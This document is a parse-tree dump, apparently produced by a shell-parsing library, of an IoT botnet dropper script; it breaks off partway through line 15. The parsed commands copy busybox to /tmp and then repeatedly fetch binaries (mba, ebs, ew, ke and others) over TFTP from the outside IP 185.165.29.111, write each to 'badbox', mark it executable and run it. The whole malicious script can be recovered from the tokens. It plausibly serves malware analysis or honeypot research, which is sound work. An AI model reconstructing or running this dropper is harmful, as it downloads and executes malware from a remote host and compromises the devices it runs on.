CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 169), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 133), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 115), word='mba'),
    WordNode(lineno=4, pos=(116, 118), word='-g'),
    WordNode(lineno=4, pos=(119, 133), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(133, 134)),
  CommandNode(lineno=4, pos=(134, 149), parts=[
    WordNode(lineno=4, pos=(134, 137), word='cat'),
    WordNode(lineno=4, pos=(138, 141), word='mba'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(143, 149), word='badbox'), pos=(142, 149), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(149, 150)),
  CommandNode(lineno=4, pos=(150, 160), parts=[
    WordNode(lineno=4, pos=(150, 155), word='chmod'),
    WordNode(lineno=4, pos=(156, 158), word='+x'),
    WordNode(lineno=4, pos=(159, 160), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(160, 161)),
  CommandNode(lineno=4, pos=(161, 169), parts=[
    WordNode(lineno=4, pos=(161, 169), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(170, 290), parts=[
  CommandNode(lineno=5, pos=(170, 177), parts=[
    WordNode(lineno=5, pos=(170, 172), word='cd'),
    WordNode(lineno=5, pos=(173, 177), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(178, 180)),
  CommandNode(lineno=5, pos=(181, 192), parts=[
    WordNode(lineno=5, pos=(181, 183), word='cd'),
    WordNode(lineno=5, pos=(184, 192), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(193, 195)),
  CommandNode(lineno=5, pos=(196, 203), parts=[
    WordNode(lineno=5, pos=(196, 198), word='cd'),
    WordNode(lineno=5, pos=(199, 203), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(204, 206)),
  CommandNode(lineno=5, pos=(207, 215), parts=[
    WordNode(lineno=5, pos=(207, 209), word='cd'),
    WordNode(lineno=5, pos=(210, 215), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(216, 218)),
  CommandNode(lineno=5, pos=(219, 223), parts=[
    WordNode(lineno=5, pos=(219, 221), word='cd'),
    WordNode(lineno=5, pos=(222, 223), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(223, 224)),
  CommandNode(lineno=5, pos=(225, 254), parts=[
    WordNode(lineno=5, pos=(225, 229), word='tftp'),
    WordNode(lineno=5, pos=(230, 232), word='-r'),
    WordNode(lineno=5, pos=(233, 236), word='ebs'),
    WordNode(lineno=5, pos=(237, 239), word='-g'),
    WordNode(lineno=5, pos=(240, 254), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(254, 255)),
  CommandNode(lineno=5, pos=(255, 270), parts=[
    WordNode(lineno=5, pos=(255, 258), word='cat'),
    WordNode(lineno=5, pos=(259, 262), word='ebs'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(264, 270), word='badbox'), pos=(263, 270), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(270, 271)),
  CommandNode(lineno=5, pos=(271, 281), parts=[
    WordNode(lineno=5, pos=(271, 276), word='chmod'),
    WordNode(lineno=5, pos=(277, 279), word='+x'),
    WordNode(lineno=5, pos=(280, 281), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(281, 282)),
  CommandNode(lineno=5, pos=(282, 290), parts=[
    WordNode(lineno=5, pos=(282, 290), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(291, 409), parts=[
  CommandNode(lineno=6, pos=(291, 298), parts=[
    WordNode(lineno=6, pos=(291, 293), word='cd'),
    WordNode(lineno=6, pos=(294, 298), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(299, 301)),
  CommandNode(lineno=6, pos=(302, 313), parts=[
    WordNode(lineno=6, pos=(302, 304), word='cd'),
    WordNode(lineno=6, pos=(305, 313), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(314, 316)),
  CommandNode(lineno=6, pos=(317, 324), parts=[
    WordNode(lineno=6, pos=(317, 319), word='cd'),
    WordNode(lineno=6, pos=(320, 324), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(325, 327)),
  CommandNode(lineno=6, pos=(328, 336), parts=[
    WordNode(lineno=6, pos=(328, 330), word='cd'),
    WordNode(lineno=6, pos=(331, 336), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(337, 339)),
  CommandNode(lineno=6, pos=(340, 344), parts=[
    WordNode(lineno=6, pos=(340, 342), word='cd'),
    WordNode(lineno=6, pos=(343, 344), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(344, 345)),
  CommandNode(lineno=6, pos=(346, 374), parts=[
    WordNode(lineno=6, pos=(346, 350), word='tftp'),
    WordNode(lineno=6, pos=(351, 353), word='-r'),
    WordNode(lineno=6, pos=(354, 356), word='ew'),
    WordNode(lineno=6, pos=(357, 359), word='-g'),
    WordNode(lineno=6, pos=(360, 374), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(374, 375)),
  CommandNode(lineno=6, pos=(375, 389), parts=[
    WordNode(lineno=6, pos=(375, 378), word='cat'),
    WordNode(lineno=6, pos=(379, 381), word='ew'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(383, 389), word='badbox'), pos=(382, 389), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(389, 390)),
  CommandNode(lineno=6, pos=(390, 400), parts=[
    WordNode(lineno=6, pos=(390, 395), word='chmod'),
    WordNode(lineno=6, pos=(396, 398), word='+x'),
    WordNode(lineno=6, pos=(399, 400), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(400, 401)),
  CommandNode(lineno=6, pos=(401, 409), parts=[
    WordNode(lineno=6, pos=(401, 409), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(410, 528), parts=[
  CommandNode(lineno=7, pos=(410, 417), parts=[
    WordNode(lineno=7, pos=(410, 412), word='cd'),
    WordNode(lineno=7, pos=(413, 417), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(418, 420)),
  CommandNode(lineno=7, pos=(421, 432), parts=[
    WordNode(lineno=7, pos=(421, 423), word='cd'),
    WordNode(lineno=7, pos=(424, 432), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(433, 435)),
  CommandNode(lineno=7, pos=(436, 443), parts=[
    WordNode(lineno=7, pos=(436, 438), word='cd'),
    WordNode(lineno=7, pos=(439, 443), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(444, 446)),
  CommandNode(lineno=7, pos=(447, 455), parts=[
    WordNode(lineno=7, pos=(447, 449), word='cd'),
    WordNode(lineno=7, pos=(450, 455), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(456, 458)),
  CommandNode(lineno=7, pos=(459, 463), parts=[
    WordNode(lineno=7, pos=(459, 461), word='cd'),
    WordNode(lineno=7, pos=(462, 463), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(463, 464)),
  CommandNode(lineno=7, pos=(465, 493), parts=[
    WordNode(lineno=7, pos=(465, 469), word='tftp'),
    WordNode(lineno=7, pos=(470, 472), word='-r'),
    WordNode(lineno=7, pos=(473, 475), word='aw'),
    WordNode(lineno=7, pos=(476, 478), word='-g'),
    WordNode(lineno=7, pos=(479, 493), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(493, 494)),
  CommandNode(lineno=7, pos=(494, 508), parts=[
    WordNode(lineno=7, pos=(494, 497), word='cat'),
    WordNode(lineno=7, pos=(498, 500), word='aw'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(502, 508), word='badbox'), pos=(501, 508), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(508, 509)),
  CommandNode(lineno=7, pos=(509, 519), parts=[
    WordNode(lineno=7, pos=(509, 514), word='chmod'),
    WordNode(lineno=7, pos=(515, 517), word='+x'),
    WordNode(lineno=7, pos=(518, 519), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(519, 520)),
  CommandNode(lineno=7, pos=(520, 528), parts=[
    WordNode(lineno=7, pos=(520, 528), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(529, 649), parts=[
  CommandNode(lineno=8, pos=(529, 536), parts=[
    WordNode(lineno=8, pos=(529, 531), word='cd'),
    WordNode(lineno=8, pos=(532, 536), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(537, 539)),
  CommandNode(lineno=8, pos=(540, 551), parts=[
    WordNode(lineno=8, pos=(540, 542), word='cd'),
    WordNode(lineno=8, pos=(543, 551), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(552, 554)),
  CommandNode(lineno=8, pos=(555, 562), parts=[
    WordNode(lineno=8, pos=(555, 557), word='cd'),
    WordNode(lineno=8, pos=(558, 562), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(563, 565)),
  CommandNode(lineno=8, pos=(566, 574), parts=[
    WordNode(lineno=8, pos=(566, 568), word='cd'),
    WordNode(lineno=8, pos=(569, 574), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(575, 577)),
  CommandNode(lineno=8, pos=(578, 582), parts=[
    WordNode(lineno=8, pos=(578, 580), word='cd'),
    WordNode(lineno=8, pos=(581, 582), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(582, 583)),
  CommandNode(lineno=8, pos=(584, 613), parts=[
    WordNode(lineno=8, pos=(584, 588), word='tftp'),
    WordNode(lineno=8, pos=(589, 591), word='-r'),
    WordNode(lineno=8, pos=(592, 595), word='ftr'),
    WordNode(lineno=8, pos=(596, 598), word='-g'),
    WordNode(lineno=8, pos=(599, 613), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(613, 614)),
  CommandNode(lineno=8, pos=(614, 629), parts=[
    WordNode(lineno=8, pos=(614, 617), word='cat'),
    WordNode(lineno=8, pos=(618, 621), word='ftr'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(623, 629), word='badbox'), pos=(622, 629), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(629, 630)),
  CommandNode(lineno=8, pos=(630, 640), parts=[
    WordNode(lineno=8, pos=(630, 635), word='chmod'),
    WordNode(lineno=8, pos=(636, 638), word='+x'),
    WordNode(lineno=8, pos=(639, 640), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(640, 641)),
  CommandNode(lineno=8, pos=(641, 649), parts=[
    WordNode(lineno=8, pos=(641, 649), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(650, 768), parts=[
  CommandNode(lineno=9, pos=(650, 657), parts=[
    WordNode(lineno=9, pos=(650, 652), word='cd'),
    WordNode(lineno=9, pos=(653, 657), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(658, 660)),
  CommandNode(lineno=9, pos=(661, 672), parts=[
    WordNode(lineno=9, pos=(661, 663), word='cd'),
    WordNode(lineno=9, pos=(664, 672), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(673, 675)),
  CommandNode(lineno=9, pos=(676, 683), parts=[
    WordNode(lineno=9, pos=(676, 678), word='cd'),
    WordNode(lineno=9, pos=(679, 683), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(684, 686)),
  CommandNode(lineno=9, pos=(687, 695), parts=[
    WordNode(lineno=9, pos=(687, 689), word='cd'),
    WordNode(lineno=9, pos=(690, 695), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(696, 698)),
  CommandNode(lineno=9, pos=(699, 703), parts=[
    WordNode(lineno=9, pos=(699, 701), word='cd'),
    WordNode(lineno=9, pos=(702, 703), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(703, 704)),
  CommandNode(lineno=9, pos=(705, 733), parts=[
    WordNode(lineno=9, pos=(705, 709), word='tftp'),
    WordNode(lineno=9, pos=(710, 712), word='-r'),
    WordNode(lineno=9, pos=(713, 715), word='er'),
    WordNode(lineno=9, pos=(716, 718), word='-g'),
    WordNode(lineno=9, pos=(719, 733), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(733, 734)),
  CommandNode(lineno=9, pos=(734, 748), parts=[
    WordNode(lineno=9, pos=(734, 737), word='cat'),
    WordNode(lineno=9, pos=(738, 740), word='er'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(742, 748), word='badbox'), pos=(741, 748), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(748, 749)),
  CommandNode(lineno=9, pos=(749, 759), parts=[
    WordNode(lineno=9, pos=(749, 754), word='chmod'),
    WordNode(lineno=9, pos=(755, 757), word='+x'),
    WordNode(lineno=9, pos=(758, 759), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(759, 760)),
  CommandNode(lineno=9, pos=(760, 768), parts=[
    WordNode(lineno=9, pos=(760, 768), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(769, 887), parts=[
  CommandNode(lineno=10, pos=(769, 776), parts=[
    WordNode(lineno=10, pos=(769, 771), word='cd'),
    WordNode(lineno=10, pos=(772, 776), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(777, 779)),
  CommandNode(lineno=10, pos=(780, 791), parts=[
    WordNode(lineno=10, pos=(780, 782), word='cd'),
    WordNode(lineno=10, pos=(783, 791), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(792, 794)),
  CommandNode(lineno=10, pos=(795, 802), parts=[
    WordNode(lineno=10, pos=(795, 797), word='cd'),
    WordNode(lineno=10, pos=(798, 802), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(803, 805)),
  CommandNode(lineno=10, pos=(806, 814), parts=[
    WordNode(lineno=10, pos=(806, 808), word='cd'),
    WordNode(lineno=10, pos=(809, 814), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(815, 817)),
  CommandNode(lineno=10, pos=(818, 822), parts=[
    WordNode(lineno=10, pos=(818, 820), word='cd'),
    WordNode(lineno=10, pos=(821, 822), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(822, 823)),
  CommandNode(lineno=10, pos=(824, 852), parts=[
    WordNode(lineno=10, pos=(824, 828), word='tftp'),
    WordNode(lineno=10, pos=(829, 831), word='-r'),
    WordNode(lineno=10, pos=(832, 834), word='re'),
    WordNode(lineno=10, pos=(835, 837), word='-g'),
    WordNode(lineno=10, pos=(838, 852), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(852, 853)),
  CommandNode(lineno=10, pos=(853, 867), parts=[
    WordNode(lineno=10, pos=(853, 856), word='cat'),
    WordNode(lineno=10, pos=(857, 859), word='re'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(861, 867), word='badbox'), pos=(860, 867), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(867, 868)),
  CommandNode(lineno=10, pos=(868, 878), parts=[
    WordNode(lineno=10, pos=(868, 873), word='chmod'),
    WordNode(lineno=10, pos=(874, 876), word='+x'),
    WordNode(lineno=10, pos=(877, 878), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(878, 879)),
  CommandNode(lineno=10, pos=(879, 887), parts=[
    WordNode(lineno=10, pos=(879, 887), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(888, 1006), parts=[
  CommandNode(lineno=11, pos=(888, 895), parts=[
    WordNode(lineno=11, pos=(888, 890), word='cd'),
    WordNode(lineno=11, pos=(891, 895), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(896, 898)),
  CommandNode(lineno=11, pos=(899, 910), parts=[
    WordNode(lineno=11, pos=(899, 901), word='cd'),
    WordNode(lineno=11, pos=(902, 910), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(911, 913)),
  CommandNode(lineno=11, pos=(914, 921), parts=[
    WordNode(lineno=11, pos=(914, 916), word='cd'),
    WordNode(lineno=11, pos=(917, 921), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(922, 924)),
  CommandNode(lineno=11, pos=(925, 933), parts=[
    WordNode(lineno=11, pos=(925, 927), word='cd'),
    WordNode(lineno=11, pos=(928, 933), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(934, 936)),
  CommandNode(lineno=11, pos=(937, 941), parts=[
    WordNode(lineno=11, pos=(937, 939), word='cd'),
    WordNode(lineno=11, pos=(940, 941), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(941, 942)),
  CommandNode(lineno=11, pos=(943, 971), parts=[
    WordNode(lineno=11, pos=(943, 947), word='tftp'),
    WordNode(lineno=11, pos=(948, 950), word='-r'),
    WordNode(lineno=11, pos=(951, 953), word='ty'),
    WordNode(lineno=11, pos=(954, 956), word='-g'),
    WordNode(lineno=11, pos=(957, 971), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(971, 972)),
  CommandNode(lineno=11, pos=(972, 986), parts=[
    WordNode(lineno=11, pos=(972, 975), word='cat'),
    WordNode(lineno=11, pos=(976, 978), word='ty'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(980, 986), word='badbox'), pos=(979, 986), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(986, 987)),
  CommandNode(lineno=11, pos=(987, 997), parts=[
    WordNode(lineno=11, pos=(987, 992), word='chmod'),
    WordNode(lineno=11, pos=(993, 995), word='+x'),
    WordNode(lineno=11, pos=(996, 997), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(997, 998)),
  CommandNode(lineno=11, pos=(998, 1006), parts=[
    WordNode(lineno=11, pos=(998, 1006), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1007, 1125), parts=[
  CommandNode(lineno=12, pos=(1007, 1014), parts=[
    WordNode(lineno=12, pos=(1007, 1009), word='cd'),
    WordNode(lineno=12, pos=(1010, 1014), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1015, 1017)),
  CommandNode(lineno=12, pos=(1018, 1029), parts=[
    WordNode(lineno=12, pos=(1018, 1020), word='cd'),
    WordNode(lineno=12, pos=(1021, 1029), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1030, 1032)),
  CommandNode(lineno=12, pos=(1033, 1040), parts=[
    WordNode(lineno=12, pos=(1033, 1035), word='cd'),
    WordNode(lineno=12, pos=(1036, 1040), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1041, 1043)),
  CommandNode(lineno=12, pos=(1044, 1052), parts=[
    WordNode(lineno=12, pos=(1044, 1046), word='cd'),
    WordNode(lineno=12, pos=(1047, 1052), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1053, 1055)),
  CommandNode(lineno=12, pos=(1056, 1060), parts=[
    WordNode(lineno=12, pos=(1056, 1058), word='cd'),
    WordNode(lineno=12, pos=(1059, 1060), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1060, 1061)),
  CommandNode(lineno=12, pos=(1062, 1090), parts=[
    WordNode(lineno=12, pos=(1062, 1066), word='tftp'),
    WordNode(lineno=12, pos=(1067, 1069), word='-r'),
    WordNode(lineno=12, pos=(1070, 1072), word='ke'),
    WordNode(lineno=12, pos=(1073, 1075), word='-g'),
    WordNode(lineno=12, pos=(1076, 1090), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1090, 1091)),
  CommandNode(lineno=12, pos=(1091, 1105), parts=[
    WordNode(lineno=12, pos=(1091, 1094), word='cat'),
    WordNode(lineno=12, pos=(1095, 1097), word='ke'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1099, 1105), word='badbox'), pos=(1098, 1105), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1105, 1106)),
  CommandNode(lineno=12, pos=(1106, 1116), parts=[
    WordNode(lineno=12, pos=(1106, 1111), word='chmod'),
    WordNode(lineno=12, pos=(1112, 1114), word='+x'),
    WordNode(lineno=12, pos=(1115, 1116), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1116, 1117)),
  CommandNode(lineno=12, pos=(1117, 1125), parts=[
    WordNode(lineno=12, pos=(1117, 1125), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1126, 1244), parts=[
  CommandNode(lineno=13, pos=(1126, 1133), parts=[
    WordNode(lineno=13, pos=(1126, 1128), word='cd'),
    WordNode(lineno=13, pos=(1129, 1133), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1134, 1136)),
  CommandNode(lineno=13, pos=(1137, 1148), parts=[
    WordNode(lineno=13, pos=(1137, 1139), word='cd'),
    WordNode(lineno=13, pos=(1140, 1148), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1149, 1151)),
  CommandNode(lineno=13, pos=(1152, 1159), parts=[
    WordNode(lineno=13, pos=(1152, 1154), word='cd'),
    WordNode(lineno=13, pos=(1155, 1159), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1160, 1162)),
  CommandNode(lineno=13, pos=(1163, 1171), parts=[
    WordNode(lineno=13, pos=(1163, 1165), word='cd'),
    WordNode(lineno=13, pos=(1166, 1171), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1172, 1174)),
  CommandNode(lineno=13, pos=(1175, 1179), parts=[
    WordNode(lineno=13, pos=(1175, 1177), word='cd'),
    WordNode(lineno=13, pos=(1178, 1179), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1179, 1180)),
  CommandNode(lineno=13, pos=(1181, 1209), parts=[
    WordNode(lineno=13, pos=(1181, 1185), word='tftp'),
    WordNode(lineno=13, pos=(1186, 1188), word='-r'),
    WordNode(lineno=13, pos=(1189, 1191), word='as'),
    WordNode(lineno=13, pos=(1192, 1194), word='-g'),
    WordNode(lineno=13, pos=(1195, 1209), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1209, 1210)),
  CommandNode(lineno=13, pos=(1210, 1224), parts=[
    WordNode(lineno=13, pos=(1210, 1213), word='cat'),
    WordNode(lineno=13, pos=(1214, 1216), word='as'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1218, 1224), word='badbox'), pos=(1217, 1224), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1224, 1225)),
  CommandNode(lineno=13, pos=(1225, 1235), parts=[
    WordNode(lineno=13, pos=(1225, 1230), word='chmod'),
    WordNode(lineno=13, pos=(1231, 1233), word='+x'),
    WordNode(lineno=13, pos=(1234, 1235), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1235, 1236)),
  CommandNode(lineno=13, pos=(1236, 1244), parts=[
    WordNode(lineno=13, pos=(1236, 1244), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1245, 1363), parts=[
  CommandNode(lineno=14, pos=(1245, 1252), parts=[
    WordNode(lineno=14, pos=(1245, 1247), word='cd'),
    WordNode(lineno=14, pos=(1248, 1252), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1253, 1255)),
  CommandNode(lineno=14, pos=(1256, 1267), parts=[
    WordNode(lineno=14, pos=(1256, 1258), word='cd'),
    WordNode(lineno=14, pos=(1259, 1267), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1268, 1270)),
  CommandNode(lineno=14, pos=(1271, 1278), parts=[
    WordNode(lineno=14, pos=(1271, 1273), word='cd'),
    WordNode(lineno=14, pos=(1274, 1278), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1279, 1281)),
  CommandNode(lineno=14, pos=(1282, 1290), parts=[
    WordNode(lineno=14, pos=(1282, 1284), word='cd'),
    WordNode(lineno=14, pos=(1285, 1290), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1291, 1293)),
  CommandNode(lineno=14, pos=(1294, 1298), parts=[
    WordNode(lineno=14, pos=(1294, 1296), word='cd'),
    WordNode(lineno=14, pos=(1297, 1298), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1298, 1299)),
  CommandNode(lineno=14, pos=(1300, 1328), parts=[
    WordNode(lineno=14, pos=(1300, 1304), word='tftp'),
    WordNode(lineno=14, pos=(1305, 1307), word='-r'),
    WordNode(lineno=14, pos=(1308, 1310), word='fg'),
    WordNode(lineno=14, pos=(1311, 1313), word='-g'),
    WordNode(lineno=14, pos=(1314, 1328), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1328, 1329)),
  CommandNode(lineno=14, pos=(1329, 1343), parts=[
    WordNode(lineno=14, pos=(1329, 1332), word='cat'),
    WordNode(lineno=14, pos=(1333, 1335), word='fg'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1337, 1343), word='badbox'), pos=(1336, 1343), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1343, 1344)),
  CommandNode(lineno=14, pos=(1344, 1354), parts=[
    WordNode(lineno=14, pos=(1344, 1349), word='chmod'),
    WordNode(lineno=14, pos=(1350, 1352), word='+x'),
    WordNode(lineno=14, pos=(1353, 1354), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1354, 1355)),
  CommandNode(lineno=14, pos=(1355, 1363), parts=[
    WordNode(lineno=14, pos=(1355, 1363), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1364, 1486), parts=[
  CommandNode(lineno=15, pos=(1364, 1371), parts=[
    WordNode(lineno=15, pos=(1364, 1366), word='cd'),
    WordNode(lineno=15, pos=(1367, 1371), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1372, 1374)),
  CommandNode(lineno=15, pos=(1375, 1386), parts=[
    WordNode(lineno=15, pos=(1375, 1377), word='cd'),
    WordNode(lineno=15, pos=(1378, 1386), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1387, 1389)),
  CommandNode(lineno=15, pos=(1390, 1397), parts=[
    WordNode(lineno=15, pos=(1390, 1392), word='cd'),
    WordNode(lineno=15, pos=(1393, 1397), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1398, 1400)),
  CommandNode(lineno=15, pos=(1401, 1409), parts=[
    WordNode(lineno=15, pos=(1401, 1403), word='cd'),
    WordNode(lineno=15, pos=(1404, 1409), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1410, 1412)),
  CommandNode(lineno=15, pos=(1413, 1417), parts=[
    WordNode(lineno=15, pos=(1413, 1415), word='cd'),
    WordNode(lineno=15, pos=(1416, 1417), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1417, 1418)),
  CommandNode(lineno=15, pos=(1419, 1449), parts=[
    WordNode(lineno=15, pos=(1419, 1423), word='tftp'),
    WordNode(lineno=15, pos=(1424, 1426), word='-r'),
    WordNode(lineno=15, pos=(1427, 1431), word='sddf'),
    WordNode(lineno=15, pos=(1432, 1434), word='-g'),
    WordNode(lineno=15, pos=(1435, 1449), word='185.165.29.111'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1449, 1450)),
  CommandNode(lineno=15, pos=(1450, 1466), parts=[
    WordNode(lineno=15, pos=(1450, 1453), word='cat'),
    WordNode(lineno=15, pos=(1454, 1458), word='sddf'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1460, 1466), word='badbox'), pos=(1459, 1466), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1466, 1467)),
  CommandNode(lineno=15, pos=(1467, 1477), parts=[
    WordNode(lineno=15, pos=(1467, 1472), word='chmod'),
    WordNode(lineno=15, pos=(1473, 1475), word='+x'),
    WordNode(lineno=15, pos=(1476, 1477), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1477, 1478)),
